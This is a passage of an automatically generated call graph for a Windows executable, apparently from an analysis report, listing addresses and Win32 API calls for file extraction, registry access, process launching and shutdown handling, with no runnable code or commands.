CharPrevA 2289->2291 2316 e752b6 2290->2316 2292 e72fab LoadLibraryA 2291->2292 2293 e72ff7 FreeLibrary 2292->2293 2294 e72fc0 GetProcAddress 2292->2294 2296 e73017 SetCurrentDirectoryA 2293->2296 2297 e73006 2293->2297 2294->2293 2295 e72fd6 DecryptFileA 2294->2295 2295->2293 2306 e72ff0 2295->2306 2298 e73026 2296->2298 2299 e73054 2296->2299 2297->2296 2631 e7621e GetWindowsDirectoryA 2297->2631 2301 e744b9 20 API calls 2298->2301 2303 e73061 2299->2303 2641 e73b26 2299->2641 2305 e73037 2301->2305 2310 e7307a 2303->2310 2303->2311 2650 e7256d 2303->2650 2717 e76285 GetLastError 2305->2717 2306->2293 2312 e73098 2310->2312 2661 e73ba2 2310->2661 2311->2288 2312->2311 2314 e730af 2312->2314 2719 e74169 2314->2719 2317 e752d6 2316->2317 2325 e75316 2316->2325 2319 e75300 LocalFree LocalFree 2317->2319 2321 e752eb SetFileAttributesA DeleteFileA 2317->2321 2318 e75374 2320 e7538c 2318->2320 3049 e71fe1 2318->3049 2319->2317 2319->2325 2322 e76ce0 4 API calls 2320->2322 2321->2319 2324 e72c72 2322->2324 2324->2225 2324->2233 2325->2318 2326 e7535e SetCurrentDirectoryA 2325->2326 2327 e765e8 4 API calls 2325->2327 2328 e72390 13 API calls 2326->2328 2327->2326 2328->2318 2330 e71f9f 2329->2330 2331 e71f9a 2329->2331 2333 e71fc0 2330->2333 2334 e744b9 20 API calls 2330->2334 2337 e71fd9 2330->2337 2332 e71ea7 15 API calls 2331->2332 2332->2330 2335 e71fcf ExitWindowsEx 2333->2335 2336 e71ee2 GetCurrentProcess OpenProcessToken 2333->2336 2333->2337 2334->2333 2335->2337 2339 e71f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2336->2339 2340 e71f0e 2336->2340 2337->2225 2339->2340 2341 e71f6b ExitWindowsEx 2339->2341 2343 e744b9 20 API calls 2340->2343 2341->2340 2342 e71f1f 2341->2342 2344 e76ce0 4 API calls 2342->2344 2343->2342 2345 e71f8c 2344->2345 2345->2225 2347 e746b6 2346->2347 2349 e72d1a 2346->2349 2348 e746be FindResourceA LoadResource LockResource 2347->2348 2347->2349 2348->2349 2350 e746df memcpy_s FreeResource 2348->2350 2349->2238 2349->2239 2350->2349 2352 e76ceb 2351->2352 2353 e76ce8 2351->2353 2468 e76cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2352->2468 2353->2249 2355 e76e26 2355->2249 2357 e744fe LoadStringA 2356->2357 2370 e7455a 2356->2370 2358 e74527 2357->2358 2359 e74562 2357->2359 2361 e7681f 10 API calls 2358->2361 2365 e745c9 2359->2365 2372 e7457e 2359->2372 2360 e76ce0 4 API calls 2362 e74689 2360->2362 2363 e7452c 2361->2363 2362->2243 2364 e74536 MessageBoxA 2363->2364 2481 e767c9 2363->2481 2364->2370 2367 e74607 LocalAlloc 2365->2367 2368 e745cd LocalAlloc 2365->2368 2367->2370 2379 e745c4 2367->2379 2368->2370 2373 e745f3 2368->2373 2370->2360 2372->2372 2375 e74596 LocalAlloc 2372->2375 2376 e7171e _vsnprintf 2373->2376 2374 e7462d MessageBeep 2469 e7681f 2374->2469 2375->2370 2378 e745af 2375->2378 2376->2379 2487 e7171e 2378->2487 2379->2374 2382 e74645 MessageBoxA LocalFree 2382->2370 2384 e767c9 EnumResourceLanguagesA 2384->2382 2390 e75cc3 2385->2390 2391 e75e17 2385->2391 2386 e76ce0 4 API calls 2388 e72e2c 2386->2388 2387 e75ced CharNextA 2387->2390 2388->2253 2388->2254 2389 e75dec GetModuleFileNameA 2389->2391 2392 e75e0a 2389->2392 2390->2387 2390->2391 2394 e76218 2390->2394 2396 e75dd0 2390->2396 2398 e75e36 CharUpperA 2390->2398 2404 e75f9f CharUpperA 2390->2404 2405 e75f59 CompareStringA 2390->2405 2406 e76003 CharUpperA 2390->2406 2407 e7667f IsDBCSLeadByte CharNextA 2390->2407 2408 e75edc CharUpperA 2390->2408 2409 e760a2 CharUpperA 2390->2409 2502 e7658a 2390->2502 2391->2386 2497 e766c8 2392->2497 2506 e76e2a 2394->2506 2396->2389 2396->2391 2398->2390 2399 e761d0 2398->2399 2400 e744b9 20 API calls 2399->2400 2401 e761e7 2400->2401 2402 e761f7 ExitProcess 2401->2402 2403 e761f0 CloseHandle 2401->2403 2403->2402 2404->2390 2405->2390 2406->2390 2407->2390 2408->2390 2409->2390 2412 e724cb 2411->2412 2415 e723b9 2411->2415 2413 e76ce0 4 API calls 2412->2413 2414 e724dc 2413->2414 2414->2267 2415->2412 2416 e723e9 FindFirstFileA 2415->2416 2416->2412 2417 e72407 2416->2417 2418 e72421 lstrcmpA 2417->2418 2419 e72479 2417->2419 2421 e724a9 FindNextFileA 2417->2421 2424 e7658a CharPrevA 2417->2424 2425 e72390 5 API calls 2417->2425 2420 e72431 lstrcmpA 2418->2420 2418->2421 2423 e72488 SetFileAttributesA DeleteFileA 2419->2423 2420->2417 2420->2421 2421->2417 2422 e724bd FindClose RemoveDirectoryA 2421->2422 2422->2412 2423->2421 2424->2417 2425->2417 2431 e73737 2426->2431 2433 e7372d 2426->2433 2427 e744b9 20 API calls 2428 e739fc 2427->2428 2429 e76ce0 4 API calls 2428->2429 2430 e72e92 2429->2430 2430->2243 2430->2267 2441 e718a3 2430->2441 2431->2428 2431->2433 2434 e738a4 2431->2434 2513 e728e8 2431->2513 2433->2427 2433->2428 2434->2428 2434->2433 2435 e739c1 MessageBeep 2434->2435 2436 e7681f 10 API calls 2435->2436 2437 e739ce 2436->2437 2438 e739d8 MessageBoxA 2437->2438 2439 e767c9 EnumResourceLanguagesA 2437->2439 2438->2428 2439->2438 2442 e718d5 2441->2442 2443 e719b8 2441->2443 2542 e717ee LoadLibraryA 2442->2542 2444 e76ce0 4 API calls 2443->2444 2446 e719d5 2444->2446 2446->2267 2461 e76517 FindResourceA 2446->2461 2448 e718e5 GetCurrentProcess OpenProcessToken 2448->2443 2449 e71900 GetTokenInformation 2448->2449 2450 e719aa CloseHandle 2449->2450 2451 e71918 GetLastError 2449->2451 2450->2443 2451->2450 2452 e71927 LocalAlloc 2451->2452 2453 e719a9 2452->2453 2454 e71938 GetTokenInformation 2452->2454 2453->2450 2455 e719a2 LocalFree 2454->2455 2456 e7194e AllocateAndInitializeSid 2454->2456 2455->2453 2456->2455 2459 e7196e 2456->2459 2457 e71999 FreeSid 2457->2455 2458 e71975 EqualSid 2458->2459 2460 e7198c 2458->2460 2459->2457 2459->2458 2459->2460 2460->2457 2462 e76536 LoadResource 2461->2462 2463 e7656b 2461->2463 2462->2463 2465 e76544 DialogBoxIndirectParamA FreeResource 2462->2465 2464 e744b9 20 API calls 2463->2464 2466 e7657c 2464->2466 2465->2463 2465->2466 2466->2267 2468->2355 2470 e76857 GetVersionExA 2469->2470 2471 e76940 2469->2471 2473 e7687c 2470->2473 2480 e7691a 2470->2480 2472 e76ce0 4 API calls 2471->2472 2474 e7463b 2472->2474 2475 e768a5 GetSystemMetrics 2473->2475 2473->2480 2474->2382 2474->2384 2476 e768b5 RegOpenKeyExA 2475->2476 2475->2480 2477 e768d6 RegQueryValueExA RegCloseKey 2476->2477 2476->2480 2478 e7690c 2477->2478 2477->2480 2491 e766f9 2478->2491 2480->2471 2482 e767e2 2481->2482 2485 e76803 2481->2485 2495 e76793 EnumResourceLanguagesA 2482->2495 2484 e767f5 2484->2485 2496 e76793 EnumResourceLanguagesA 2484->2496 2485->2364 2488 e7172d 2487->2488 2489 e7175d 2488->2489 2490 e7173d _vsnprintf 2488->2490 2489->2379 2490->2489 2492 e7670f 2491->2492 2493 e76740 CharNextA 2492->2493 2494 e7674b 2492->2494 2493->2492 2494->2480 2495->2484 2496->2485 2500 e766d5 2497->2500 2498 e766f3 2498->2391 2500->2498 2501 e766e5 CharNextA 2500->2501 2509 e76648 2500->2509 2501->2500 2503 e7659b 2502->2503 2503->2503 2504 e765ab 2503->2504 2505 e765b8 CharPrevA 2503->2505 2504->2390 2505->2504 2512 e76cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2506->2512 2508 e7621d 2510 e76668 2509->2510 2511 e7665d IsDBCSLeadByte 2509->2511 2510->2500 2511->2510 2512->2508 2514 e72a62 2513->2514 2521 e7290d 2513->2521 2515 e72a75 2514->2515 2516 e72a6e GlobalFree 2514->2516 2515->2434 2516->2515 2518 e72955 GlobalAlloc 2518->2514 2519 e72968 GlobalLock 2518->2519 2519->2514 2519->2521 2520 e72a20 GlobalUnlock 2520->2521 2521->2514 2521->2518 2521->2520 2522 e72a80 GlobalUnlock 2521->2522 2523 e72773 2521->2523 2522->2514 2524 e727a3 CharUpperA CharNextA CharNextA 2523->2524 2525 e728b2 2523->2525 2526 e728b7 GetSystemDirectoryA 2524->2526 2527 e727db 2524->2527 2525->2526 2529 e728bf 2526->2529 2528 e728a8 GetWindowsDirectoryA 2527->2528 2531 e727e3 2527->2531 2528->2529 2530 e728d2 2529->2530 2532 e7658a CharPrevA 2529->2532 2533 e76ce0 4 API calls 2530->2533 2534 e7658a CharPrevA 2531->2534 2532->2530 2535 e728e2 2533->2535 2536 e72810 RegOpenKeyExA 2534->2536 2535->2521 2536->2529 2537 e72837 RegQueryValueExA 2536->2537 2538 e7285c 2537->2538 2539 e7289a RegCloseKey 2537->2539 2540 e72867 ExpandEnvironmentStringsA 2538->2540 2541 e7287a 2538->2541 2539->2529 2540->2541 2541->2539 2543 e71826 GetProcAddress 2542->2543 2544 e71890 2542->2544 2546 e71889 FreeLibrary 2543->2546 2547 e71839 AllocateAndInitializeSid 2543->2547 2545 e76ce0 4 API calls 2544->2545 2548 e7189f 2545->2548 2546->2544 2547->2546 2549 e7185f FreeSid 2547->2549 2548->2443 2548->2448 2549->2546 2552 e7468f 7 API calls 2551->2552 2553 e751f9 LocalAlloc 2552->2553 2554 e7522d 2553->2554 2555 e7520d 2553->2555 2557 e7468f 7 API calls 2554->2557 2556 e744b9 20 API calls 2555->2556 2558 e7521e 2556->2558 2559 e7523a 2557->2559 2560 e76285 GetLastError 2558->2560 2561 e75262 lstrcmpA 2559->2561 2562 e7523e 2559->2562 2569 e72f4d 2560->2569 2564 e75272 LocalFree 2561->2564 2565 e7527e 2561->2565 2563 e744b9 20 API calls 2562->2563 2567 e7524f LocalFree 2563->2567 2564->2569 2566 e744b9 20 API calls 2565->2566 2568 e75290 LocalFree 2566->2568 2567->2569 2568->2569 2569->2278 2569->2280 2569->2311 2571 e7468f 7 API calls 2570->2571 2572 e75175 2571->2572 2573 e7517a 2572->2573 2574 e751af 2572->2574 2575 e744b9 20 API calls 2573->2575 2576 e7468f 7 API calls 2574->2576 2582 e7518d 2575->2582 2577 e751c0 2576->2577 2732 e76298 2577->2732 2580 e751e1 2580->2281 2581 e744b9 20 API calls 2581->2582 2582->2281 2584 e7468f 7 API calls 2583->2584 2585 e755c7 LocalAlloc 2584->2585 2586 e755fd 2585->2586 2587 e755db 2585->2587 2589 e7468f 7 API calls 2586->2589 2588 e744b9 20 API calls 2587->2588 2590 e755ec 2588->2590 2591 e7560a 2589->2591 2592 e76285 GetLastError 2590->2592 2593 e75632 lstrcmpA 2591->2593 2594 e7560e 2591->2594 2619 e755f1 2592->2619 2595 e75645 2593->2595 2596 e7564b LocalFree 2593->2596 2597 e744b9 20 API calls 2594->2597 2595->2596 2598 e75696 2596->2598 2599 e7565b 2596->2599 2600 e7561f LocalFree 2597->2600 2601 e7589f 2598->2601 2604 e756ae GetTempPathA 2598->2604 2605 e75467 49 API calls 2599->2605 2600->2619 2602 e76517 24 API calls 2601->2602 2602->2619 2603 e76ce0 4 API calls 2606 e72f7e 2603->2606 2607 e756eb 2604->2607 2608 e756c3 2604->2608 2609 e75678 2605->2609 2606->2289 2606->2311 2613 e75717 GetDriveTypeA 2607->2613 2614 e7586c GetWindowsDirectoryA 2607->2614 2607->2619 2744 e75467 2608->2744 2612 e744b9 20 API calls 2609->2612 2609->2619 2612->2619 2617 e75730 GetFileAttributesA 2613->2617 2629 e7572b 2613->2629 2778 e7597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2778 2617->2629 2619->2603 2620 e75467 49 API calls 2620->2607 2621 e72630 21 API calls 2621->2629 2623 e757c1 GetWindowsDirectoryA 2623->2629 2624 e7658a CharPrevA 2626 e757e8 GetFileAttributesA 2624->2626 2625 e7597d 34 API calls 2625->2629 2627 e757fa CreateDirectoryA 2626->2627 2626->2629 2627->2629 2628 e75827 SetFileAttributesA 2628->2629 2629->2613 2629->2614 2629->2617 2629->2619 2629->2621 2629->2623 2629->2624 2629->2625 2629->2628 2630 e75467 49 API calls 2629->2630 2774 e76952 2629->2774 2630->2629 2632 e76249 2631->2632 2633 e76268 2631->2633 2635 e744b9 20 API calls 2632->2635 2634 e7597d 34 API calls 2633->2634 2639 e7625f 2634->2639 2636 e7625a 2635->2636 2637 e76285 GetLastError 2636->2637 2637->2639 2638 e76ce0 4 API calls 2640 e73013 2638->2640 2639->2638 2640->2296 2640->2311 2642 e73b2d 2641->2642 2642->2642 2643 e73b72 2642->2643 2645 e73b53 2642->2645 2844 e74fe0 2643->2844 2646 e76517 24 API calls 2645->2646 2647 e73b70 2646->2647 2648 e76298 10 API calls 2647->2648 2649 e73b7b 2647->2649 2648->2649 2649->2303 2651 e72583 2650->2651 2652 e72622 2650->2652 2653 e725e8 RegOpenKeyExA 2651->2653 2655 e7258b 2651->2655 2895 e724e0 GetWindowsDirectoryA 2652->2895 2656 e725e3 2653->2656 2657 e72609 RegQueryInfoKeyA 2653->2657 2655->2656 2658 e7259b RegOpenKeyExA 2655->2658 2656->2310 2659 e725d1 RegCloseKey 2657->2659 2658->2656 2660 e725bc RegQueryValueExA 2658->2660 2659->2656 2660->2659 2662 e73bdb 2661->2662 2677 e73bec 2661->2677 2663 e7468f 7 API calls 2662->2663 2663->2677 2664 e73c03 memset 2664->2677 2665 e73d13 2667 e744b9 20 API calls 2665->2667 2666 e7468f 7 API calls 2666->2677 2673 e73d26 2667->2673 2669 e76ce0 4 API calls 2670 e73f60 2669->2670 2670->2312 2671 e73d7b CompareStringA 2672 e73fd7 2671->2672 2671->2677 2672->2673 2994 e72267 2672->2994 2673->2669 2675 e73fab 2678 e744b9 20 API calls 2675->2678 2677->2664 2677->2665 2677->2666 2677->2671 2677->2672 2677->2673 2677->2675 2679 e73f46 LocalFree 2677->2679 2680 e73f1e LocalFree 2677->2680 2684 e73cc7 CompareStringA 2677->2684 2695 e73e10 2677->2695 2903 e71ae8 2677->2903 2944 e7202a memset memset RegCreateKeyExA 2677->2944 2970 e73fef 2677->2970 2682 e73fbe LocalFree 2678->2682 2679->2673 2680->2672 2680->2677 2682->2673 2684->2677 2685 e73f92 2688 e744b9 20 API calls 2685->2688 2686 e73e1f GetProcAddress 2687 e73f64 2686->2687 2686->2695 2690 e744b9 20 API calls 2687->2690 2689 e73fa9 2688->2689 2691 e73f7c LocalFree 2689->2691 2692 e73f75 FreeLibrary 2690->2692 2693 e76285 GetLastError 2691->2693 2692->2691 2694 e73f8b 2693->2694 2694->2673 2695->2685 2695->2686 2696 e73f40 FreeLibrary 2695->2696 2697 e73eff FreeLibrary 2695->2697 2984 e76495 2695->2984 2696->2679 2697->2680 2699 e7468f 7 API calls 2698->2699 2700 e73a55 LocalAlloc 2699->2700 2701 e73a8e 2700->2701 2702 e73a6c 2700->2702 2704 e7468f 7 API calls 2701->2704 2703 e744b9 20 API calls 2702->2703 2705 e73a7d 2703->2705 2706 e73a98 2704->2706 2707 e76285 GetLastError 2705->2707 2708 e73ac5 lstrcmpA 2706->2708 2709 e73a9c 2706->2709 2713 e72f64 2707->2713 2711 e73b0d LocalFree 2708->2711 2712 e73ada 2708->2712 2710 e744b9 20 API calls 2709->2710 2714 e73aad LocalFree 2710->2714 2711->2713 2715 e76517 24 API calls 2712->2715 2713->2278 2713->2311 2714->2713 2716 e73aec LocalFree 2715->2716 2716->2713 2718 e7628f 2717->2718 2718->2311 2720 e7468f 7 API calls 2719->2720 2721 e7417d LocalAlloc 2720->2721 2722 e74195 2721->2722 2723 e741a8 2721->2723 2725 e744b9 20 API calls 2722->2725 2724 e7468f 7 API calls 2723->2724 2726 e741b5 2724->2726 2727 e741a6 2725->2727 2728 e741c5 lstrcmpA 2726->2728 2729 e741b9 2726->2729 2727->2311 2728->2729 2730 e741e6 LocalFree 2728->2730 2731 e744b9 20 API calls 2729->2731 2730->2727 2731->2730 2733 e7171e _vsnprintf 2732->2733 2734 e762c9 FindResourceA 2733->2734 2736 e76353 2734->2736 2737 e762cb LoadResource LockResource 2734->2737 2738 e76ce0 4 API calls 2736->2738 2737->2736 2740 e762e0 2737->2740 2739 e751ca 2738->2739 2739->2580 2739->2581 2741 e76355 FreeResource 2740->2741 2742 e7631b FreeResource 2740->2742 2741->2736 2743 e7171e _vsnprintf 2742->2743 2743->2734 2745 e7548a 2744->2745 2765 e7551a 2744->2765 2804 e753a1 2745->2804 2747 e75581 2753 e76ce0 4 API calls 2747->2753 2750 e7554d 2750->2747 2759 e7597d 34 API calls 2750->2759 2751 e7553b CreateDirectoryA 2755 e75577 2751->2755 2756 e75547 2751->2756 2752 e75495 2752->2747 2757 e754c2 GetSystemInfo 2752->2757 2758 e7550c 2752->2758 2754 e7559a 2753->2754 2754->2619 2768 e72630 GetWindowsDirectoryA 2754->2768 2760 e76285 GetLastError 2755->2760 2756->2750 2762 e754da 2757->2762 2761 e7658a CharPrevA 2758->2761 2763 e7555c 2759->2763 2764 e7557c 2760->2764 2761->2765 2762->2758 2766 e7658a CharPrevA 2762->2766 2763->2747 2767 e75568 RemoveDirectoryA 2763->2767 2764->2747 2815 e758c8 2765->2815 2766->2758 2767->2747 2769 e7266f 2768->2769 2770 e7265e 2768->2770 2772 e76ce0 4 API calls 2769->2772 2771 e744b9 20 API calls 2770->2771 2771->2769 2773 e72687 2772->2773 2773->2607 2773->2620 2775 e769a1 2774->2775 2776 e7696e GetDiskFreeSpaceA 2774->2776 2775->2629 2776->2775 2777 e76989 MulDiv 2776->2777 2777->2775 2779 e759dd GetDiskFreeSpaceA 2778->2779 2780 e759bb 2778->2780 2781 e75ba1 memset 2779->2781 2782 e75a21 MulDiv 2779->2782 2783 e744b9 20 API calls 2780->2783 2784 e76285 GetLastError 2781->2784 2782->2781 2785 e75a50 GetVolumeInformationA 2782->2785 2786 e759cc 2783->2786 2787 e75bbc GetLastError FormatMessageA 2784->2787 2788 e75ab5 SetCurrentDirectoryA 2785->2788 2789 e75a6e memset 2785->2789 2790 e76285 GetLastError 2786->2790 2791 e75be3 2787->2791 2799 e75acc 2788->2799 2792 e76285 GetLastError 2789->2792 2797 e759d1 2790->2797 2793 e744b9 20 API calls 2791->2793 2794 e75a89 GetLastError FormatMessageA 2792->2794 2795 e75bf5 SetCurrentDirectoryA 2793->2795 2794->2791 2795->2797 2796 e76ce0 4 API calls 2798 e75c11 2796->2798 2797->2796 2798->2607 2800 e75b0a 2799->2800 2802 e75b20 2799->2802 2801 e744b9 20 API calls 2800->2801 2801->2797 2802->2797 2827 e7268b 2802->2827 2806 e753bf 2804->2806 2805 e7171e _vsnprintf 2805->2806 2806->2805 2807 e7658a CharPrevA 2806->2807 2810 e75415 GetTempFileNameA 2806->2810 2808 e753fa RemoveDirectoryA GetFileAttributesA 2807->2808 2808->2806 2809 e7544f CreateDirectoryA 2808->2809 2809->2810 2811 e7543a 2809->2811 2810->2811 2812 e75429 DeleteFileA CreateDirectoryA 2810->2812 2813 e76ce0 4 API calls 2811->2813 2812->2811 2814 e75449 2813->2814 2814->2752 2816 e758d8 2815->2816 2816->2816 2817 e758df LocalAlloc 2816->2817 2818 e758f3 2817->2818 2819 e75919 2817->2819 2820 e744b9 20 API calls 2818->2820 2822 e7658a CharPrevA 2819->2822 2826 e75906 2820->2826 2821 e76285 GetLastError 2824 e75534 2821->2824 2823 e75931 CreateFileA LocalFree 2822->2823 2825 e7595b CloseHandle GetFileAttributesA 2823->2825 2823->2826 2824->2750 2824->2751 2825->2826 2826->2821 2826->2824 2828 e726e5 2827->2828 2829 e726b9 2827->2829 2831 e7271f 2828->2831 2832 e726ea 2828->2832 2830 e7171e _vsnprintf 2829->2830 2833 e726cc 2830->2833 2835 e7171e _vsnprintf 2831->2835 2841 e726e3 2831->2841 2834 e7171e _vsnprintf 2832->2834 2837 e744b9 20 API calls 2833->2837 2838 e726fd 2834->2838 2839 e72735 2835->2839 2836 e76ce0 4 API calls 2840 e7276d 2836->2840 2837->2841 2842 e744b9 20 API calls 2838->2842 2843 e744b9 20 API calls 2839->2843 2840->2797 2841->2836 2842->2841 2843->2841 2845 e7468f 7 API calls 2844->2845 2846 e74ff5 FindResourceA LoadResource LockResource 2845->2846 2847 e75020 2846->2847 2860 e7515f 2846->2860 2848 e75057 2847->2848 2849 e75029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2847->2849 2863 e74efd 2848->2863 2849->2848 2852 e75060 2853 e744b9 20 API calls 2852->2853 2857 e75075 2853->2857 2854 e744b9 20 API calls 2854->2857 2855 e75110 FreeResource 2856 e7511d 2855->2856 2858 e7513a 2856->2858 2861 e744b9 20 API calls 2856->2861 2857->2855 2857->2856 2858->2860 2862 e7514c SendMessageA 2858->2862 2859 e7507c 2859->2854 2859->2857 2860->2647 2861->2858 2862->2860 2864 e74f4a 2863->2864 2870 e74fa1 2864->2870 2871 e74980 2864->2871 2866 e76ce0 4 API calls 2867 e74fc6 2866->2867 2867->2852 2867->2859 2870->2866 2872 e74990 2871->2872 2873 e749a5 2872->2873 2874 e749c2 lstrcmpA 2872->2874 2875 e744b9 20 API calls 2873->2875 2876 e749ba 2874->2876 2877 e74a0e 2874->2877 2875->2876 2876->2870 2879 e74b60 2876->2879 2877->2876 2882 e7487a 2877->2882 2880 e74b76 2879->2880 2881 e74b92 FindCloseChangeNotification 2879->2881 2880->2870 2881->2880 2883 e748a2 CreateFileA 2882->2883 2885 e748e9 2883->2885 2886 e74908 2883->2886 2885->2886 2887 e748ee 2885->2887 2886->2876 2890 e7490c 2887->2890 2891 e748f5 CreateFileA 2890->2891 2892 e74917 2890->2892 2891->2886 2892->2891 2893 e74962 CharNextA 2892->2893 2894 e74953 CreateDirectoryA 2892->2894 2893->2892 2894->2893 2896 e72510 2895->2896 2897 e7255b 2895->2897 2899 e7658a CharPrevA 2896->2899 2898 e76ce0 4 API calls 2897->2898 2900 e72569 2898->2900 2901 e72522 WritePrivateProfileStringA _lopen 2899->2901 2900->2656 2901->2897 2902 e72548 _llseek _lclose 2901->2902 2902->2897 2904 e71b25 2903->2904 3008 e71a84 2904->3008 2906 e71b57 2907 e7658a CharPrevA 2906->2907 2908 e71b8c 2906->2908 2907->2908 2909 e766c8 2 API calls 2908->2909 2910 e71bd1 2909->2910 2911 e71d73 2910->2911 2912 e71bd9 CompareStringA 2910->2912 2914 e766c8 2 API calls 2911->2914 2912->2911 2913 e71bf7 GetFileAttributesA 2912->2913 2915 e71d53 2913->2915 2916 e71c0d 2913->2916 2917 e71d7d 2914->2917 2920 e71d64 2915->2920 2916->2915 2921 e71a84 2 API calls 2916->2921 2918 e71d81 CompareStringA 2917->2918 2919 e71df8 LocalAlloc 2917->2919 2918->2919 2928 e71d9b 2918->2928 2919->2920 2922 e71e0b GetFileAttributesA 2919->2922 2923 e744b9 20 API calls 2920->2923 2924 e71c31 2921->2924 2925 e71e1d 2922->2925 2942 e71e45 2922->2942 2926 e71d6c 2923->2926 2927 e71c50 LocalAlloc 2924->2927 2932 e71a84 2 API calls 2924->2932 2925->2942 2930 e76ce0 4 API calls 2926->2930 2927->2920 2929 e71c67 GetPrivateProfileIntA GetPrivateProfileStringA 2927->2929 2928->2928 2933 e71dbe LocalAlloc 2928->2933 2937 e71cf8 2929->2937 2941 e71cc2 2929->2941 2931 e71ea1 2930->2931 2931->2677 2932->2927 2933->2920 2936 e71de1 2933->2936 2940 e7171e _vsnprintf 2936->2940 2938 e71d23 2937->2938 2939 e71d09 GetShortPathNameA 2937->2939 2943 e7171e _vsnprintf 2938->2943 2939->2938 2940->2941 2941->2926 3014 e72aac 2942->3014 2943->2941 2945 e72256 2944->2945 2946 e7209a 2944->2946 2947 e76ce0 4 API calls 2945->2947 2949 e7171e _vsnprintf 2946->2949 2951 e720dc 2946->2951 2948 e72263 2947->2948 2948->2677 2950 e720af RegQueryValueExA 2949->2950 2950->2946 2950->2951 2952 e720e4 RegCloseKey 2951->2952 2953 e720fb GetSystemDirectoryA 2951->2953 2952->2945 2954 e7658a CharPrevA 2953->2954 2955 e7211b LoadLibraryA 2954->2955 2956 e7212e GetProcAddress FreeLibrary 2955->2956 2957 e72179 GetModuleFileNameA 2955->2957 2956->2957 2958 e7214e GetSystemDirectoryA 2956->2958 2959 e721de RegCloseKey 2957->2959 2962 e72177 2957->2962 2960 e72165 2958->2960 2958->2962 2959->2945 2961 e7658a CharPrevA 2960->2961 2961->2962 2962->2962 2963 e721b7 LocalAlloc 2962->2963 2964 e721cd 2963->2964 2965 e721ec 2963->2965 2966 e744b9 20 API calls 2964->2966 2967 e7171e _vsnprintf 2965->2967 2966->2959 2968 e72218 RegSetValueExA RegCloseKey LocalFree 2967->2968 2968->2945 2971 e74016 CreateProcessA 2970->2971 2972 e74106 2970->2972 2973 e740c4 2971->2973 2974 e74041 WaitForSingleObject GetExitCodeProcess 2971->2974 2975 e76ce0 4 API calls 2972->2975 2978 e76285 GetLastError 2973->2978 2976 e74070 2974->2976 2977 e74117 2975->2977 3041 e7411b 2976->3041 2977->2677 2980 e740c9 GetLastError FormatMessageA 2978->2980 2982 e744b9 20 API calls 2980->2982 2981 e74096 CloseHandle CloseHandle 2981->2972 2983 e740ba 2981->2983 2982->2972 2983->2972 2985 e764c2 2984->2985 2986 e7658a CharPrevA 2985->2986 2987 e764d8 GetFileAttributesA 2986->2987 2988 e76501 LoadLibraryA 2987->2988 2989 e764ea 2987->2989 2991 e76508 2988->2991 2989->2988 2990 e764ee LoadLibraryExA 2989->2990 2990->2991 2992 e76ce0 4 API calls 2991->2992 2993 e76513 2992->2993 2993->2695 2995 e72381 2994->2995 2996 e72289 RegOpenKeyExA 2994->2996 2998 e76ce0 4 API calls 2995->2998 2996->2995 2997 e722b1 RegQueryValueExA 2996->2997 3000 e722e6 memset GetSystemDirectoryA 2997->3000 3001 e72374 RegCloseKey 2997->3001 2999 e7238c 2998->2999 2999->2673 3002 e72321 3000->3002 3003 e7230f 3000->3003 3001->2995 3005 e7171e _vsnprintf 3002->3005 3004 e7658a CharPrevA 3003->3004 3004->3002 3006 e7233f RegSetValueExA 3005->3006 3006->3001 3009 e71a9a 3008->3009 3011 e71aba 3009->3011 3013 e71aaf 3009->3013 3027 e7667f 3009->3027 3011->2906 3012 e7667f 2 API calls 3012->3013 3013->3011 3013->3012 3015 e72ad4 GetModuleFileNameA 3014->3015 3016 e72be6 3014->3016 3026 e72b02 3015->3026 3017 e76ce0 4 API calls 3016->3017 3019 e72bf5 3017->3019 3018 e72af1 IsDBCSLeadByte 3018->3026 3019->2926 3020 e72b11 CharNextA CharUpperA 3022 e72b8d CharUpperA 3020->3022 3020->3026 3021 e72bca CharNextA 3023 e72bd3 CharNextA 3021->3023 3022->3026 3023->3026 3025 e72b43 CharPrevA 3025->3026 3026->3016 3026->3018 3026->3020 3026->3021 3026->3023 3026->3025 3032 e765e8 3026->3032 3030 e76689 3027->3030 3028 e76648 IsDBCSLeadByte 3028->3030 3029 e766a5 3029->3009 3030->3028 3030->3029 3031 e76697 CharNextA 3030->3031 3031->3030 3033 e765f4 3032->3033 3033->3033 3034 e765fb CharPrevA 3033->3034 3035 e76611 CharPrevA 3034->3035 3036 e7661e 3035->3036 3037 e7660b 3035->3037 3038 e7663d 3036->3038 3039 e76627 CharPrevA 3036->3039 3040 e76634 CharNextA 3036->3040 3037->3035 3037->3036 3038->3026 3039->3038 3039->3040 3040->3038 3042 e74132 3041->3042 3044 e7412a 3041->3044 3045 e71ea7 3042->3045 3044->2981 3046 e71eba 3045->3046 3047 e71ed3 3045->3047 3048 e7256d 15 API calls 3046->3048 3047->3044 3048->3047 3050 e72026 3049->3050 3051 e71ff0 RegOpenKeyExA 3049->3051 3050->2320 3051->3050 3052 e7200f RegDeleteValueA RegCloseKey 3051->3052 3052->3050 3053 e74ca0 GlobalAlloc 3119 e719e0 3120 e71a24 GetDesktopWindow 3119->3120 3121 e71a03 3119->3121 3128 e743d0 6 API calls 3120->3128 3122 e71a20 3121->3122 3124 e71a16 EndDialog 3121->3124 3126 e76ce0 4 API calls 3122->3126 3124->3122 3127 e71a7e 3126->3127 3130 e74463 SetWindowPos 3128->3130 3131 e76ce0 4 API calls 3130->3131 3132 e71a33 LoadStringA SetDlgItemTextA MessageBeep 3131->3132 3132->3122 3133 e76a20 __getmainargs 3134 e76bef _XcptFilter 3135 e76ef0 3136 e76f02 3135->3136 3137 e76f2d 3135->3137 3136->3137 3138 e76f27 ?terminate@ 3136->3138 3138->3137 3139 e734f0 3140 e73504 3139->3140 3141 e735b8 3139->3141 3140->3141 3142 e735be GetDesktopWindow 3140->3142 3143 e7351b 3140->3143 3144 e73671 EndDialog 3141->3144 3150 e73526 3141->3150 3145 e743d0 11 API calls 3142->3145 3146 e7354f 3143->3146 3147 e7351f 3143->3147 3144->3150 3149 e735d6 3145->3149 3148 e73559 ResetEvent 3146->3148 3146->3150 3147->3150 3151 e7352d TerminateThread EndDialog 3147->3151 3152 e744b9 20 API calls 3148->3152 3153 e735e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3149->3153 3154 e7361d SetWindowTextA CreateThread 3149->3154 3151->3150 3155 e73581 